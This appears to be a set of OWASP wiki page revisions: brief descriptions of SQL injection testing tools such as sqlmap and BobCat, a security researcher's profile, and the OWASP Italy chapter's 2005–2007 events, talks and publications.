SQL Power Injector is a .Net 1.1 application used to find and exploit SQL Injection vulnerability through a vulnerable web application which uses SQL Server, MySql, Sybase/Adaptive Server and DB2 Database Management Systems as backend. It’s main feature is the support for multithreaded automation of the injection.

http://www.sqlpowerinjector.com

== BobCat ==

BobCat is a tool based on “Data Thief” and realized in .NET 2.0. It permits to take full advantage of SQL Injection vulnerability discovered in a web application to steal data, gain a shell or a reverse shell on the database management system machine. It has been tested on MSDE2000.

http://www.northern-monkee.co.uk/index.html

User:Inquis

2009-01-14T10:48:44Z

Inquis:

=== Who I am ===

My name is Bernardo Damele A. G., I am an IT Security Engineer based in London (United Kingdom) currently employed as Penetration Tester.
I spent the last years researching on web application security.
I am [http://sqlmap.sourceforge.net sqlmap] lead developer.

=== Links ===

* Personal [http://bernardodamele.blogspot.com/ blog]
* [mailto:bernardo.damele@gmail.com E-mail address / Jabber]
* Skype contact: inquis

=== Participations to OWASP ===

* [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007] [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap participation]:
** [http://sqlmap.sourceforge.net sqlmap] project [http://www.owasp.org/index.php/SpoC_007_-_SqlMap contest page] and [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]
* [[OWASP_Testing_Guide_v3_Table_of_Contents|OWASP Testing Guide v3]] contributor
* [[Italy|OWASP Italy]] and [[London|OWASP London]] chapters member

User:Inquis

2008-06-07T10:26:13Z

Inquis:

=== Who I am ===

My name is Bernardo Damele, I am a software engineer and security consultant based in Italy where I mostly deal with vulnerability assessment and penetration test. I spent part of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006.

=== Links ===

* Personal [http://bernardodamele.blogspot.com/ blog]
* [mailto:bernardo.damele@gmail.com Email address / GTalk / MSN]
* Skype contact: inquis

=== Participations to OWASP ===

* [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007] [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap participation]:
** [http://sqlmap.sourceforge.net sqlmap] project [http://www.owasp.org/index.php/SpoC_007_-_SqlMap contest page] and [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]
* [[OWASP_Testing_Guide_v3_Table_of_Contents|OWASP Testing Guide v3]] contributing author
* [[Italy|OWASP Italy]] board member

User:Inquis

2008-06-07T10:25:06Z

Inquis:

==== Who I am ====

My name is Bernardo Damele, I am a software engineer and security consultant based in Italy where I mostly deal with vulnerability assessment and penetration test. I spent part of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006.

==== Links ====

* Personal [http://bernardodamele.blogspot.com/ blog]
* [mailto:bernardo.damele@gmail.com Email address / GTalk / MSN]
* Skype contact: inquis

=== Participations to OWASP ===

* [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007] [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap participation]:
** [http://sqlmap.sourceforge.net sqlmap] project [http://www.owasp.org/index.php/SpoC_007_-_SqlMap contest page] and [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]
* [[OWASP_Testing_Guide_v3_Table_of_Contents|OWASP Testing Guide v3]] contributing author
* [[Italy|OWASP Italy]] board member

Italy

2007-11-12T09:59:27Z

Inquis:

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

== NEWS: The presentation of the OWASP Day 1 Conference are on-line! ==
----
[[http://www.owasp.org/index.php/Italy#September_10th.2C_2007_-_OWASP_Day_WorldWide:_.22Privacy_in_the_21st_Century.22 Here]] you can dowload it.

== NEXT EVENT:: OWASP Italy at SMAU E-Academy 2007 ==
----

Next 20th October we will have 5 speeches at SMAU E-Academy 2007.
Here are the appointments:

* Giorgio Fedon, COO at Minded Security: "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting"
Saturday 20th October: 10:30

* Paolo Perego, Senior Security Consultant at Spike Reply: "The Owasp Orizon project - bring security at the source"
Saturday 20th October: 14:00

* Antonio Parata, Security Consultant at eMaze: "Valutazione del rischio tramite la logica fuzzy"
Saturday 20th October: 15:30

* Alberto Revelli, Senior Security Consultant at Portcullis Security: "Anti-Anti-XSS: bypass delle difese del browser"
Saturday 20th October: 16:30

* Stefano Di Paola, CTO at Minded Security: "Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" 
Saturday 20th October: 17:00

[http://www.eacademy.it/article/articleview/2020/1/owasp_italia Here] you can read more information about it.

== Local Activities ==

* There is already a qualified group (CISSP, CISA, BS7799 Lead Auditor, OPST, OPSA) of volunteers working on the following tasks:
<ul>
- Working at the new OWASP Testing Guide! (Matteo Meucci, Alberto Revelli, Stefano Di Paola, Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin) 
- Translate all OWASP documentations in italian language (Matteo Paolelli, Massimiliano Graziani) 
- Writing articles about OWASP Project for infosecmag (Matteo Meucci, Alessandro Graziani, Lorenzo De Santis, Marco Graia, Luca Carettoni, Carlo Pelliccioni) 
- Working at the project OWASP Legal (Dario Vaccaro, Marco Scialdone) 
- Working at the project OWASP Code Review (Paolo Perego) 
- Developing WebAppSec tools & Research (Stefano Di Paola, Daniele Bellucci, Alberto Revelli, Antonio Parata, Bernardo Damele)
</ul>

== OWASP-Italy Board ==
* This is the (not official) '''OWASP-Italy Board''':
<ul>
Founder and Chair: Matteo Meucci 
Director of Communication: Raoul Chiesa 
Technical Director : Alberto Revelli 
R&D Director: Stefano Di Paola 
Technical Writer Director: Lorenzo De Santis 
Italian Translation of docs and papers: Matteo Paolelli, Massimiliano Graziani. 
Official active members: Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin, Paolo Perego, Daniele Bellucci, Bernardo Damele.
</ul>

== What is OWASP? ==

[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

== OWASP-Italy is a CLUSIT Member ==

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations.
So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member

== NEWS: OWASP-Italy at InfoSecurity 07 ==

* (Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )
[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

* (Oct 06) ISACA Roma has published several interview with OWASP-Italy members:
[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]]
[[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]]
[[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]]
[[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]]
[[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

* (Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

* (Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

* (Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

* Top10 Vulnerabilities - OWASP-Italy survey:
[[Image:Top 10 vulnerabilities-mini.GIF]]

* (21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.
Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications".
[http://www.infosecurity.it/Roma/programma.php More info here]

* (1 Jun 06) '''"Quaderno CLUSIT"'''
CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP".
Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

* (31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

* (1 Mar 06) '''OWASP-Boston, Microsoft'''
Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting.
[http://www.owasp.org/local/boston.html More info here]

* (18 Nov 05) '''IDC - European Banking Forum'''
Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005].
Agenda:
- New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
- Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

* (Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.
SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

* (Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]
Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

* (May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

* (Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

* The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

* (Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

* (Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

== Events ==

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===
----
[[Image:Master.jpg]]

Thanks to the collaboration with the [http://mastersicurezza.uniroma1.it Master on Information Security of the Universita di Roma "La Sapienza"], we have organized the OWASP Day here in Italy the last 10th September 2007 during the Global Security Week.
 
The event sponsor was [http://www.watchfire.com Watchfire]:

[[Image:Watchfire.gif]]

 
* The topic was Web Application Security & Privacy and we had 6 talks: a set technical and a set more at high level.

Here is the Agenda and the presentations:

Start meeting: 9.15

* 9.15-9.30. Prof. L.Mancini (Director of the Master in Information Security, Università "La Sapienza" Rome):
"Welcome and open of the works"
[[Image:OWASP_Day1_Mancini.pdf]]

* 9.30-9.45 M.Meucci (OWASP-Italy Chair, CEO Minded Security):
"Introduction to the OWASP-Day and OWASP-Italy projects"
[[Image:OWASP_Day1_Meucci.ppt]]

* 9.45-10.15. Mauro Bregolin (Principal Consultant - KIMA Projects & Services):
"Privacy in the digital era"
[[Image:OWASP_Day1_Bregolin.ppt]]

* 10.15-10.45. Carlo Pelliccioni (Security Consultant - @Mediaservice.net):
"OWASP Top 10 2007 - Are our information "really" safe?"
[[Image:OWASP-Day1_Pelliccioni.pdf]] [[Image:Video_Top-10-2007_part1.zip]] [[Image:Video_Top-10-2007_part2.zip]]

* 10.45-11.15. Alberto Revelli (Senior Consultant - Portcullis Computer Security):
"Anti-Anti-XSS: bypassing browser protections"
[[Image:OWASP-Day1_Revelli.ppt]]

* 11.15-11.45. Coffe break

* 11.45-12.15. Laurent Petroque (F5):
"Growing Application Security Awareness".
[[Image:OWASP_Day1_Petroque.ppt]]

* 12.15-12.45. Luca Carettoni (Security Consultant - SecureNetwork):
"Buzzwords Security"
[[Image:OWASP_Day1_Carettoni.pdf]]

* 12.45-13.30. Danny Allan (Director of Security Research - Watchfire):
"Hacker Attacks on the Horizon: Understanding the Top Web 2.0 Attack Vectors"
[[Image:OWASP_Day1_Allan.pdf]]

* Here you can download the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=events:owaspday07 audio]

* Pictures:

[[Image:Owasp Privacy Day Rome.JPG]]
[[Image:Allan.jpg]]
[[Image:Petroque.jpg]]
[[Image:Ice.jpg]]

* Participation: We have received 160 subscriptions!!!

[https://www.owasp.org/index.php/OWASP_Day Here] you can read about the global OWASP-Day.

=== May 29th, 2007 - Seminar: "Software Security" ===
----

* Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===
----

* We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.
[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza"===
----

* We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

=== March 30th, 2007 - University of Rome "La Sapienza" ===
----

* Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"
[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

=== March 1st, 2007 - EuSecWest 07 ===
----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest].
[http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===
----

* February 6th:15.30
After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0"
More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

* February 6th:16.30
After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide"
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

* February 7th:12.30
Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies."
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

* February 7th:13.30
Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice"
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===
----
Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] 
For more information: 
http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----
- "''The quest for secure code: code review and fundamental of secure coding.''"
Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities.
Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases
http://www.webb.it/event/eventview/5772

Here are the presentations: 
[[Image:Meucci_SMAU06.pdf| Meucci_SMAU06]] 
[[Image:Perego_SMAU06.pdf| Perego_SMAU 06]]

- "''Advanced SQL Injection.''"
Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing.
Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" !
http://www.webb.it/event/eventview/5774

[[Image:Revelli_SMAU06.pdf|Revelli_SMAU06 ]] 
[[Image:Parata_SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy_at_SMAU06_2.JPG]]
Luca, Carlo, Alberto, Antonio, Stefano 
Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----
September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security.
It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs.
http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio_Matteo_Carlo.JPG]]
[[Image:Antonio_speech.JPG]]
[[Image:Carlo.JPG]]
[[Image:Claudio_Luca.JPG]]
[[Image:Mayhem_Matteo.JPG]]
[[Image:OWASP_Banner2.JPG]]
[[Image:OWASP_Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----
Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100
When: 10,30 - 17,00
Who: Matteo Meucci and Alberto Revelli
Link: http://www.infosecurity.it/Roma/programma.php

Agenda:
-- I Session --
Introduction to Web Application Security
• Which are the risks?
• Risk assessment of a web application
• Core pillars of web security
How to develop secure web applications:
• Guidelines and case-studies

-- II Session --
How to realize a security audit of a web application
• The methodology OWASP Penetration Testing
• The tools: OWASP WebScarab
• Hands-on web application vulnerabilities: OWASP WebGoat
• Advanced SQL Injection.

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march.
[http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp
Agenda:
* New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
* Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy.
Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security.
Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability.
Every one is invited to join the meeting.

Here is the agenda:
14.30 Registration
14.45 Matteo Meucci - Web Application Security Phase II
- OWASP WebScarab and PenTest Checklist
* A case-study of a Web Application Vulnerability: MMS Spoofing
--- Web Application analysis
--- Authentication and Billing of the MMS service
--- Vulnerabilities
--- Attack Analysis
* Learning the most common web application vulnerabilities: OWASP WebGoat
--- Http Basics
--- HTML Clues
--- Hidden Field Tampering
--- How to spoof a Session Cookie
--- Stored Cross Site Scripting
--- Command Injection
--- SQL Injection
--- Fail Open Authentication

The meeting is hold at:
Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled:
"EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda:
14.15 Registration
14.30 Matteo Meucci - Web Application Security
- OWASP Guide: how to build secure web application
- How to test your Web Application: WebScarab and the WebApp PenTest Checklist
- How to learn the most common web application vulnerability: WebGoat
- The Top Ten WebApp vulnerabilities
- Common error on developing Web Application:
Authentication mechanisms not "secure"
Buffer Overflow and crash of the service
Thief of identity: Cross Site Scripting
Manipulation of company data: SQL Injection
Reserved information: misconfiguration
Bad session management and thief of identity
- OWASP-Italy: projects and next challenges

The meeting is hold at:
Via Volturno, 65 (Rome) - Auditorium ATAC
http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda:
- OWASP & Web Application Security
- Common Web Application Vulnerabilities
- A real case of web application vulnerability: MMS Spoofing&Billing
- Training: WebGoat

== Publications ==

=== March, 2007 Interview on HTML.it ===
----
Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )
[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===
----
After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian):
 
[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]]
[[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]]
[[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]]
[[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]]
[[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===
----
Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP".
Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform.
[http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.]
Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78):
"Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See:
www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

----

== Tools & Research ==

----

=== Nov, 2007 - sqlmap v0.5 ===

Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool [http://sqlmap.sourceforge.net sqlmap]. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 SourceForge File List page] or the latest development version from its [https://sqlmap.svn.sourceforge.net/svnroot/sqlmap SourceForge SVN repository].

=== Dec, 2006 - sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

SpoC 007 - SqlMap

2007-11-04T21:23:57Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': '''100%''' Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic SQL injection tool entirely developed in [http://www.python.org Python]. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

